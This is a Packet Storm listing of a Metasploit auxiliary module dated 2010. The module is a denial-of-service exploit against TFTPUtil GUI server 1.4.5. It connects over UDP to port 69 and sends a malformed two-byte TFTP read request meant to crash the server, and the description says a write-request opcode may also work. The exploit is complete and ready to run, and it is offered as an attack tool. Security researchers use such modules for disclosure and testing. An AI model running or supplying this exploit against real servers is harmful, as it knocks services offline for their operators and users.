The TFTPUtil GUI server version 1.4.5 can be denial of serviced by sending a specially crafted read request. Depending on the setup, sending write request "\x00\x02" may also work. This is written as a Metasploit module.
a3076b7074a8558bd2e8cbdd12535e5f9ff084b1af78b3a8b35ad73f20967942# Title: TFTPUtil GUI v1.4.5 Invalid Request DoS
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Vuk Ivanovic
# Published: 2010-12-04
# Verified: yes
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# https://metasploit.com/framework/
##
##
#
# TFTPGUI v1.4.5 Invalid Request DoS
#
# Tested on: Windows XP, SP2 (EN)
#
# Date tested: 11/27/2010
#
#
#
# Discovered by: Vuk Ivanovic(musashi42)
#
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'TFTPGUI v1.4.5 Invalid Request DoS',
'Description' => %q{
The TFTPUtil GUI server version 1.4.5 can be
DOSed by sending a specially crafted read request. Depending
of the setup, sending write request "\x00\x02" may also
work. Discovered by musashi42.
},
'Author' => 'musashi42',
'License' => MSF_LICENSE,
'Version' => '$Revision: 2 $',
'References' =>
[
[ 'URL', 'https://www.exploit-db.com/exploits/12482'],
[ 'URL', 'https://www.securityfocus.com/bid/39872'],
],
'DisclosureDate' => 'December 04 2010'))
register_options([Opt::RPORT(69)])
end
def run
connect_udp
print_status("Sending read request...")
$stuff = "\00\x01"
udp_sock.put($stuff)
disconnect_udp
end
end
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed